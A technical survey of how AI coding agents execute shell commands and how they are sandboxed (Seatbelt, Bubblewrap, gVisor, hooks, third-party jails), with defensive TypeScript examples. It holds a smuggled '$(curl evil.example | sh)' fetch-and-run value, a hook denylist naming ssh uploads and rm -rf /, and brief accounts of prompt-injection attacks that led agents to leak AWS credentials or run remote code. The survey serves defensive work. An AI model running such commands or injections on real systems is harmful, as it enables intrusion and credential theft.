
The defining architectural shift in AI-assisted development between 2025 and 2026 has been the move from code completion to code generation with execution. Modern coding agents — Claude Code, OpenAI Codex CLI, Gemini CLI, Kiro, and a growing ecosystem of open-source alternatives — do not merely suggest edits. They read files, run shell commands, inspect outputs, and loop until a task is complete. The terminal has become the primary interface through which these agents interact with the world.
This shift introduces a fundamental tension: the more autonomy an agent has over a shell, the more productive it becomes, but also the more dangerous. A single malicious or hallucinated command can delete files, exfiltrate credentials, or corrupt system state. The 2025–2026 period has seen an explosion of work on sandboxing, permission models, and execution architectures designed to manage this tension. This document surveys the current state of the art.
At their core, all major terminal agents follow the same pattern — a while(tool_call) loop [1]. The model evaluates a prompt, decides which tool to invoke (read a file, run a shell command, edit code), receives the result, and repeats until the task is complete. Claude Code's implementation centers on a single query() async generator function (~1,700 lines) through which every interaction flows — REPL, SDK, sub-agent, and headless mode alike [2]. Codex CLI implements the same pattern in Rust, and Gemini CLI follows a similar architecture with its March 2026 Plan Mode addition [3].
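A minimal sketch of the pattern in TypeScript, with a stubbed callModel function and a two-tool registry standing in for a real provider SDK (all names here are illustrative, not any agent's actual API):

```typescript
import { execFile } from "node:child_process";
import { readFile } from "node:fs/promises";

type ToolCall = { name: string; args: Record<string, string> };
type ModelTurn = { toolCall?: ToolCall; finalAnswer?: string };

// Hypothetical model client: a real agent wraps a provider SDK here.
async function callModel(transcript: string[]): Promise<ModelTurn> {
  return { finalAnswer: "stub" }; // ...send transcript, parse reply...
}

const tools: Record<string, (args: Record<string, string>) => Promise<string>> = {
  read_file: ({ path }) => readFile(path, "utf8"),
  run_shell: ({ command }) =>
    new Promise((resolve) =>
      execFile("bash", ["-c", command], { timeout: 30_000 }, (_e, out, err) =>
        resolve(out + err),
      ),
    ),
};

// The while(tool_call) loop: act, observe, repeat until no tool is requested.
async function agentLoop(prompt: string): Promise<string> {
  const transcript = [prompt];
  for (;;) {
    const turn = await callModel(transcript);
    if (!turn.toolCall) return turn.finalAnswer ?? "";
    const result = await tools[turn.toolCall.name](turn.toolCall.args);
    transcript.push(result); // tool output feeds back into the context window
  }
}
```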
The Bash tool is the most powerful and most dangerous capability in this loop. It is the "universal adapter" — anything the agent cannot do through a dedicated tool, it can attempt through a shell command. Claude Code's tool taxonomy makes this explicit: Read, Edit, Write, Glob, and Grep handle structured operations, while Bash handles everything else [2]. This generality is precisely what makes shell access the primary attack surface.
A critical architectural decision is whether agents spawn commands through a pseudo-terminal (PTY) or through non-interactive pipes. The distinction has significant implications for both functionality and security.
Non-interactive (pipe-based) execution is the default for most agents. Claude Code spawns shell commands via child_process with stdio: pipe, meaning the subprocess sees isatty() == false. This is intentional: non-interactive mode avoids the complexity of terminal escape codes, interactive prompts, and programs that expect human input. Commands like ls, grep, npm test, and git diff work perfectly in this mode. The output is clean text that feeds directly back into the model's context window [4].
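A sketch of pipe-based spawning in Node.js; the isatty probe at the end shows how a subprocess can tell it is not attached to a terminal (the helper name is mine, not Claude Code's):

```typescript
import { spawn } from "node:child_process";

// Pipe-based execution: every stdio channel is a pipe, so isatty() is
// false inside the subprocess and most CLI tools emit plain, prompt-free
// output that can feed straight back into the model's context.
function runCommand(cmd: string, args: string[]): Promise<string> {
  return new Promise((resolve, reject) => {
    const child = spawn(cmd, args, { stdio: ["ignore", "pipe", "pipe"], shell: false });
    let out = "";
    child.stdout.on("data", (chunk) => (out += chunk));
    child.stderr.on("data", (chunk) => (out += chunk));
    child.on("error", reject);
    child.on("close", (code) => resolve(`exit=${code}\n${out}`));
  });
}

// Prints "undefined": the child does not believe it is attached to a terminal.
runCommand("node", ["-e", "console.log(process.stdout.isTTY)"]).then(console.log);
```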
PTY-based execution becomes necessary when agents need to interact with programs that require a terminal — editors like vim, interactive REPLs, or tools that use terminal UI libraries. A 2025 feature request on the Claude Code repository proposed integrating node-pty to enable fully interactive shell sessions, where the agent could spawn vim, and the user would temporarily take over the terminal [4]. The Moltis orchestration framework documented a concrete problem: when Claude Code detects isatty() == false, it silently switches out of interactive mode, making it impossible for outer orchestration agents to drive it programmatically. The fix is to spawn Claude Code inside a PTY so it believes it is attached to a real terminal [5].
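A sketch of the PTY approach using the node-pty package (which must be installed separately); this illustrates the mechanism the feature request and the Moltis fix describe, not either project's actual code:

```typescript
import * as pty from "node-pty"; // npm install node-pty

// PTY-based execution: the child is attached to a pseudo-terminal, so
// isatty() == true and programs that refuse to run non-interactively
// (including Claude Code itself, per the Moltis issue) behave normally.
const shell = pty.spawn("bash", [], {
  name: "xterm-256color",
  cols: 120,
  rows: 40,
  cwd: process.cwd(),
  env: process.env as Record<string, string>,
});

shell.onData((data) => process.stdout.write(data)); // stream output back out
shell.write("node -e 'console.log(process.stdout.isTTY)'\r"); // prints "true"
shell.write("exit\r");
```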
PTY MCP servers have emerged as a middle layer. The pty-mcp project (available in both Python and Haskell implementations) exposes persistent terminal sessions as MCP tools, allowing agents to maintain stateful shell sessions across multiple tool calls rather than spawning a fresh process each time [6]. This is useful for workflows that require environment setup (activating a virtualenv, setting environment variables) before running subsequent commands.
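A rough sketch of such a persistent session, again assuming node-pty; a production server like pty-mcp would additionally watch for a prompt sentinel to delimit each command's output:

```typescript
import * as pty from "node-pty";

// One long-lived PTY backs many tool calls, so exported variables, an
// activated virtualenv, or a changed working directory survive between
// commands instead of vanishing with a fresh subprocess.
class ShellSession {
  private term = pty.spawn("bash", [], { name: "xterm-256color", cols: 80, rows: 24 });
  private buffer = "";
  constructor() {
    this.term.onData((d) => (this.buffer += d));
  }
  run(command: string): void {
    this.term.write(command + "\r");
  }
  output(): string {
    return this.buffer;
  }
}

const session = new ShellSession();
session.run("export API_STAGE=dev");  // tool call 1: set up environment
session.run("echo stage=$API_STAGE"); // tool call 2: state persists ("stage=dev")
```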
The security tradeoff is clear: PTY-based execution gives agents more capability but also more attack surface. Interactive programs can present unexpected prompts, and terminal escape sequences can be used to obfuscate malicious output. The emerging consensus is to use non-interactive execution by default and reserve PTY sessions for specific, well-understood use cases.
Claude Code's security model has evolved through two distinct phases. Initially, it relied on a permission-based model: read-only by default, with explicit user approval required for modifications or command execution. Safe commands like echo and cat were auto-allowed, but most operations required clicking "approve" [7].
In October 2025, Anthropic introduced sandboxing for Claude Code, built on OS-level primitives. The sandbox-runtime (srt) tool, released as an open-source research preview, uses sandbox-exec (Seatbelt) on macOS and Bubblewrap (bwrap) on Linux to enforce filesystem and network isolation at the kernel level [7][8]. The architecture enforces two boundaries simultaneously:
- Filesystem isolation: writes are confined to the agent's workspace, and reads of sensitive paths such as ~/.ssh, ~/.aws, or system configuration files are blocked.
- Network isolation: outbound connections are denied unless explicitly allowlisted.

Anthropic reported that sandboxing reduced permission prompts by 84% in internal usage while increasing security [7]. The srt tool is designed with a "secure-by-default" philosophy: processes start with minimal access, and developers explicitly open only the holes they need [8].
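The mechanism can be seen in miniature with macOS's sandbox-exec directly. This is a deliberately simplified, allow-by-default profile for illustration; srt's real profiles are deny-by-default and far more thorough:

```typescript
import { spawnSync } from "node:child_process";

// Simplified Seatbelt profile: allow everything, then deny network access
// and reads/writes of sensitive paths. Shows where enforcement happens,
// not how srt actually configures it.
const profile = `
(version 1)
(allow default)
(deny network*)
(deny file-read* (subpath "${process.env.HOME}/.aws"))
(deny file-write* (subpath "${process.env.HOME}/.ssh"))
`;

const result = spawnSync(
  "sandbox-exec", ["-p", profile, "curl", "-s", "https://example.com"],
  { encoding: "utf8" },
);
// curl fails: the kernel denies the network syscalls regardless of what
// command the model generated.
console.log(result.status, result.stderr);
```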
Claude Code also supports a hooks system with 17 lifecycle event interception points, allowing teams to write custom policies — for example, blocking certain API calls while allowing others. These hooks operate at the application layer, providing flexibility that kernel-level sandboxing cannot match, but they are theoretically bypassable by sufficiently crafted commands [9].
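A sketch of one such policy, written against the documented PreToolUse hook contract (the pending tool call arrives as JSON on stdin; exit code 2 blocks it and surfaces stderr to the model). The blocklist itself is illustrative, not a policy recommendation:

```typescript
#!/usr/bin/env node
// PreToolUse policy hook sketch: inspect the pending Bash command and
// block anything matching a project-specific denylist.
import { readFileSync } from "node:fs";

const event = JSON.parse(readFileSync(0, "utf8")); // fd 0 = stdin
const command: string = event.tool_input?.command ?? "";

const blocked = [/\bssh\b/, /curl\s+[^|]*--upload-file/, /rm\s+-rf\s+\//];
if (event.tool_name === "Bash" && blocked.some((re) => re.test(command))) {
  console.error(`Blocked by policy hook: ${command}`);
  process.exit(2); // deny the tool call
}
process.exit(0); // allow it to proceed
```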
Codex CLI takes a different approach: security is enforced entirely at the OS kernel level, with no application-layer fallback. Originally a Node.js/TypeScript project released in mid-2025, OpenAI rewrote the core in Rust by late 2025 (the codex-rs crate), and as of early 2026 Rust accounts for roughly 95% of the codebase [9][10].
Codex CLI offers three sandbox permission modes configured via config.toml:
| Mode | Behavior |
|---|---|
| Suggest (read-only) | Agent can read files and propose changes but cannot modify anything |
| Auto-edit (default) | Agent can write files within the project directory; network is blocked |
| Full access | No restrictions — intended for trusted environments only |
The implementation is platform-specific [9][10]:
- macOS: Seatbelt via sandbox-exec, with custom profiles per permission level.
- Linux: Bubblewrap (bwrap), which confines commands inside restricted namespaces.

The key architectural difference from Claude Code is that Codex's restrictions cannot be circumvented by the model regardless of what commands it generates. A command running inside the Bubblewrap namespace simply cannot access files outside the allowed paths — the kernel denies the syscall. The tradeoff is reduced flexibility: Claude Code's hooks allow nuanced, project-specific policies, while Codex's model is more binary [9].
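The flavor of that enforcement can be reproduced with Bubblewrap directly (standard bwrap flags, but a sketch rather than Codex CLI's actual invocation):

```typescript
import { spawn } from "node:child_process";

// Kernel-enforced scoping: the filesystem is mounted read-only, the
// project directory is re-bound writable on top, and the network
// namespace is unshared entirely.
const projectDir = "/home/dev/project"; // assumed path
const child = spawn("bwrap", [
  "--ro-bind", "/", "/",             // whole filesystem, read-only
  "--bind", projectDir, projectDir,  // project directory, writable
  "--tmpfs", "/tmp",                 // fresh scratch space
  "--unshare-net",                   // no network access at all
  "--die-with-parent",
  "bash", "-c", "touch /etc/owned || echo 'kernel said no'",
], { stdio: "inherit" });

child.on("close", (code) => console.log(`bwrap exited with code ${code}`));
```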
Google's Gemini CLI shipped two major features in March 2026: Plan Mode (enabled by default) and LXC/gVisor sandbox support [3]. Plan Mode requires the agent to present a step-by-step execution plan before taking any action, giving developers visibility into agent intent before execution begins.
For isolation, Gemini CLI offers three tiers:
| Feature | None | LXC | gVisor |
|---|---|---|---|
| Filesystem isolation | ❌ | ✅ | ✅ |
| Network isolation | ❌ | ✅ | ✅ |
| Kernel protection | ❌ | Partial | ✅ |
| Best for | Dev/Testing | CI/CD | Production |
gVisor implements a user-space kernel that intercepts system calls, exposing only ~70 syscalls versus 300+ in the Linux kernel. This provides strong isolation with minimal overhead, making it suitable for security-sensitive environments [3].
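In practice, running a workload under gVisor usually means selecting its runsc OCI runtime; a sketch, assuming Docker has runsc installed and registered:

```typescript
import { spawn } from "node:child_process";

// Running an agent workload under gVisor (https://gvisor.dev): every
// syscall the container makes is serviced by gVisor's user-space kernel,
// never the host kernel directly.
spawn("docker", [
  "run", "--rm",
  "--runtime=runsc",                   // gVisor's OCI runtime
  "--network=none",                    // pair kernel protection with egress control
  "-v", `${process.cwd()}:/workspace:ro`,
  "node:22-slim",
  "node", "-e", "console.log('hello from inside gVisor')",
], { stdio: "inherit" });
```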
Kiro operates as a terminal-native AI agent with a tool-based architecture similar to Claude Code. It executes shell commands through a Bash tool, reads and writes files through dedicated tools, and follows the same agent loop pattern. Kiro's safety model relies on a tiered risk assessment: low-risk actions (editing files, running linters) proceed automatically, medium-risk actions (installing dependencies, modifying configs) proceed with a notification, and high-risk actions (production changes, data deletion) require explicit user confirmation. This application-layer approach prioritizes developer velocity while maintaining guardrails for destructive operations.
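A minimal sketch of what such tiering can look like; the patterns and tiers here are invented for illustration and are not Kiro's actual rules:

```typescript
// Illustrative tiered risk assessment for agent-generated commands.
type Risk = "low" | "medium" | "high";

function classify(command: string): Risk {
  if (/\brm\s+-rf\b|\bDROP\s+TABLE\b|\bkubectl\s+delete\b/i.test(command)) return "high";
  if (/\b(npm|pip|apt)\s+install\b|\bgit\s+push\b/.test(command)) return "medium";
  return "low";
}

async function gate(command: string, confirm: () => Promise<boolean>): Promise<void> {
  switch (classify(command)) {
    case "low":
      break; // proceed automatically
    case "medium":
      console.log(`note: running '${command}'`); // proceed with notification
      break;
    case "high":
      if (!(await confirm())) throw new Error("user declined"); // explicit approval
  }
  // ...spawn the command here...
}
```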
The gap between what agents can do and what they should be allowed to do has spawned a rich ecosystem of third-party sandboxing tools in 2025–2026:
Sandvault (brew install sandvault) creates a separate non-admin macOS user account and runs agents inside a macOS sandbox. It supports Claude Code, Codex CLI, Gemini CLI, and others via simple wrapper commands (sv claude, sv codex). Combined with git worktrees, it enables parallelized agent work where each agent operates in an isolated environment [11].
nono enforces kernel-level boundaries with JSON-based profiles defining filesystem, network, and command access rules. It captures a filesystem snapshot before the agent starts and can restore files to their pre-agent state. A runtime supervisor mode prompts users when agents attempt to access resources outside their sandbox [12].
ai-jail (Rust, available on crates.io) combines Bubblewrap namespace isolation, Landlock LSM, and seccomp-bpf syscall filtering. Its --lockdown mode mounts the project read-only, disables GPU/Docker/display passthrough, and blocks all network access — designed for hostile workloads [13].
FortShell provides a terminal-first workspace with OS-level file protection. Users right-click sensitive files to protect them, and AI agents running in sandboxed terminals receive Operation not permitted when attempting to access protected files. Protection is enforced at the kernel level and cannot be bypassed through symlinks or scripting [14].
Cloister uses Docker containers with an allowlist proxy for network traffic. It distinguishes between "action control" (enumerating what the agent can do) and "scope control" (limiting where the agent can have effects), preferring the latter as more robust [15].
ExitBox runs agents in isolated Docker containers with DNS isolation, mandatory proxy usage, and capability restrictions. It automatically injects sandbox instructions into each agent at container start, informing the agent about its restrictions so it can adapt its behavior [16].
The 2025–2026 period has produced concrete evidence of the risks inherent in agent shell access:
Command injection via prompt injection: CVE-2025-67511 demonstrated how a cybersecurity AI agent's SSH functionality could be exploited. Attacker-controlled hostnames containing shell metacharacters were passed unsanitized to the ssh command, enabling exfiltration of AWS credentials from the agent's host [17].
Unsandboxed code execution as RCE: Multiple frameworks have been found to execute LLM-generated code without any sandboxing. Microsoft's AutoGen LocalCommandLineCodeExecutor writes model-generated code to disk and runs it as a local subprocess with only a UserWarning as a safeguard [18]. AgentScope's execute_shell_command provides zero isolation — no containers, no code inspection, no privilege dropping — and when exposed over HTTP, enables full remote code execution via prompt injection [19].
Approval fatigue: Even when permission systems exist, users habituate to clicking "approve" on every action, effectively negating the safety mechanism. This is a recognized failure mode across all agent frameworks and is a primary motivation for sandbox-based approaches that eliminate the need for per-action approval [7][20].
Shell metacharacter expansion: Agent-generated command arguments that contain glob patterns (*, ?), variable expansion ($VAR, $(cmd)), or command substitution can expand unexpectedly when passed to a shell. The recommended mitigation is to use spawn() with shell: false rather than exec(), and to pass content via stdin rather than argv [21][22].
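A small demonstration of the hazard and the mitigation in Node.js (the hostile "path" is contrived):

```typescript
import { exec, spawn } from "node:child_process";

const userPath = "$(curl evil.example | sh)"; // hostile "filename" from model output

// UNSAFE: exec() hands the whole string to /bin/sh, which performs the
// embedded command substitution before cat ever runs.
// exec(`cat ${userPath}`); // would execute: curl evil.example | sh

// SAFE: spawn() with shell:false passes argv tokens directly to the
// program; $(...), *, ?, and $VAR arrive as literal bytes, never expanded.
spawn("cat", [userPath], { shell: false });

// Better still, pass content via stdin rather than argv at all:
const wc = spawn("wc", ["-c"], { shell: false, stdio: ["pipe", "inherit", "inherit"] });
wc.stdin.end("arbitrary model-generated content, any bytes welcome\n");
```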
The collective experience of 2025–2026 has converged on several principles:
Separate inference from execution. The LLM generating commands and the sandbox running them should be completely decoupled, with a command router in between that validates, optionally requires human approval, truncates output, and feeds results back [23].
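A sketch of such a router, with an illustrative allowlist, approval callback, per-call timeout, and output cap (all limits and names are assumptions, not any specific product's design):

```typescript
import { execFile } from "node:child_process";

// Command router: validation, human approval, a hard timeout, and output
// truncation sit between the model and the sandbox.
const ALLOWLIST = new Set(["ls", "cat", "git", "grep", "npm"]);
const MAX_OUTPUT = 10_000; // characters fed back into the context window

async function route(
  argv: string[],
  approve: (argv: string[]) => Promise<boolean>,
): Promise<string> {
  if (!ALLOWLIST.has(argv[0])) throw new Error(`rejected: '${argv[0]}' not allowlisted`);
  if (!(await approve(argv))) throw new Error("human approval denied");

  return new Promise((resolve, reject) => {
    // execFile (no shell) with a hard 30-second timeout per tool call.
    execFile(argv[0], argv.slice(1), { timeout: 30_000 }, (err, stdout, stderr) => {
      if (err && !stdout && !stderr) return reject(err);
      const out = stdout + stderr;
      resolve(out.length > MAX_OUTPUT ? out.slice(0, MAX_OUTPUT) + "\n[truncated]" : out);
    });
  });
}
```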
Defense in depth, not single-layer. One analysis of the OpenClaw agent identified six distinct security layers for shell execution: host selection, safe-bin allowlist, environment sanitization, script preflight, approval gating, and elevated mode control. The layers are complementary: each catches failure modes the others miss, so removing any one weakens the whole [24].
Eliminate the shell from the data path. Pass routing information as clean argv tokens, pass content through stdin as structured JSON, and adopt NDJSON or JSON-RPC 2.0 framing for multi-message protocols. This separates data from code at the process boundary [22].
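A sketch of this pattern: routing flags travel as argv, content travels as NDJSON frames on stdin (worker.js and the message shape are hypothetical stand-ins for whatever tool sits on the other end of the pipe):

```typescript
import { spawn } from "node:child_process";

// Routing information as clean argv tokens; content as newline-delimited
// JSON on stdin, so data never passes through a shell parser.
const worker = spawn("node", ["worker.js", "--mode", "apply-edits"], {
  shell: false,
  stdio: ["pipe", "inherit", "inherit"],
});

const frames = [
  { op: "write", path: "src/index.ts", content: "export const x = 1;\n" },
  { op: "done" },
];
for (const frame of frames) {
  worker.stdin.write(JSON.stringify(frame) + "\n"); // one JSON object per line
}
worker.stdin.end();
```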
Set hard timeouts at every level. Per tool call (e.g., 30 seconds), per task loop (e.g., 20 minutes), and per sandbox lifetime. A stuck agent can run indefinitely and rack up compute costs [20].
Log everything, filter network egress. Every sandbox should emit an immutable audit log of network requests, shell commands, and file writes. Default to --network=none with an explicit allowlist [20].
Start restrictive, expand as needed. It is easier to add permissions than to audit what an overly permissive agent accessed [12].
Credential isolation. Never share primary cloud or email credentials with an agent. Use dedicated credentials, store secrets in encrypted vaults, and substitute placeholders at execution time [25].
The terminal has become the primary execution environment for AI coding agents, and the security implications of this shift are now well understood. The industry has moved from naive "run commands and hope for the best" approaches to sophisticated, multi-layered sandboxing architectures that enforce restrictions at the OS kernel level. The three major agents — Claude Code, Codex CLI, and Gemini CLI — each represent a different point in the design space, trading off flexibility against enforcement strength. Meanwhile, a vibrant third-party ecosystem fills the gaps with tools that work across agents.
The fundamental challenge remains unsolved: agents cannot reliably distinguish legitimate from adversarial instructions, and any system that grants shell access to an LLM is granting it to whatever content the LLM processes. Sandboxing does not eliminate this risk — it bounds the blast radius. The trajectory is clear: toward kernel-level enforcement by default, capability-based permission models, and architectural separation of inference from execution. The agents that survive will be the ones that make security invisible to the developer while making compromise visible to the auditor.
[1] "How Claude Code Works: Architecture & Internals" — https://cc.bruniaux.com/guide/architecture/
[2] "Ch 1. The Architecture of an AI Agent" and "Ch 5. The Agent Loop" — https://claude-code-from-source.com/ch01-architecture/ and https://claude-code-from-source.com/ch05-agent-loop/
[3] "Gemini CLI Plan Mode Guide: Enhanced Sandboxing for Safe AI Agent Development" — https://gemilab.net/en/articles/gemini-dev/gemini-cli-plan-mode
[4] "[FEATURE] Add Interactive Shell Support to the Bash Tool" — https://github.com/anthropics/claude-code/issues/9881
[5] "PTY-based interactive Claude Code CLI control for autonomous multi-agent orchestration" — https://github.com/moltis-org/moltis/issues/235
[6] "A Deep Dive into PTY Terminal MCP Server" — https://skywork.ai/skypage/en/pty-terminal-mcp-server/1980567633007206400
[7] "Making Claude Code more secure and autonomous with sandboxing" — https://www.anthropic.com/engineering/claude-code-sandboxing
[8] "anthropic-experimental/sandbox-runtime" — https://github.com/anthropic-experimental/sandbox-runtime
[9] "OpenAI Codex CLI: The Rust-Powered Terminal Agent Taking on Claude Code" — https://botmonster.com/posts/openai-codex-cli-rust-powered-ai-agent/
[10] "Codex CLI Cheat Sheet: Shortcuts and Commands" — https://computingforgeeks.com/codex-cli-cheat-sheet/
[11] "Sandboxes and Worktrees: My secure Agentic AI Setup in 2026" — https://mikemcquaid.com/sandboxed-agent-worktrees-my-coding-and-ai-setup-in-2026/
[12] "Safe AI Agent Execution with nono" — https://nono.sh/guides/safe-ai-agent-execution
[13] "ai-jail v0.9.0" — https://crates.io/crates/ai-jail/0.9.0
[14] "FortShell" — https://github.com/evergreen96/FortShell
[15] "Cloister: Secure sandboxing for AI coding agents" — https://github.com/xdg/cloister
[16] "ExitBox" — https://github.com/cloud-exit/exitbox
[17] "Cybersecurity AI agent is Vulnerable to Command Injection (CVE-2025-67511)" — https://checkmarx.com/zero-post/cybersecurity-ai-agent-is-vulnerable-to-command-injection-cve-2025-67511/
[18] "[Security] LocalCommandLineCodeExecutor executes LLM-generated code without sandboxing" — https://github.com/microsoft/autogen/issues/7462
[19] "Unsandboxed Code Execution Tools Enable Remote Code Execution via Prompt Injection" — https://gist.github.com/YLChen-007/c084d69aaeda6729f3988603f2b0ce6e
[20] "AI Agent Sandbox: How to Safely Run Autonomous Agents in 2026" — https://www.firecrawl.dev/blog/ai-agent-sandbox
[21] "Security: Unvalidated User Input in Shell Command Arguments" — https://github.com/kardolus/chatgpt-cli/issues/177
[22] "Safe Inter-Process Communication Patterns for AI Agent Toolchains" — https://zylos.ai/research/2026-02-26-safe-ipc-patterns-ai-agent-toolchains
[23] "Why Your AI Agent's Shell Access Is a Security Nightmare" — https://blog.authon.dev/why-your-ai-agent-s-shell-access-is-a-security-nightmare-and-how-to-fix-it
[24] "Protect the exec tool with six security layers, not one" — https://wiki.charleschen.ai/ai/processed/wiki/llm-core/security/techniques/exec-tool-security-layers
[25] "PrismorSec/immunity-agent" — https://github.com/PrismorSec/immunity-agent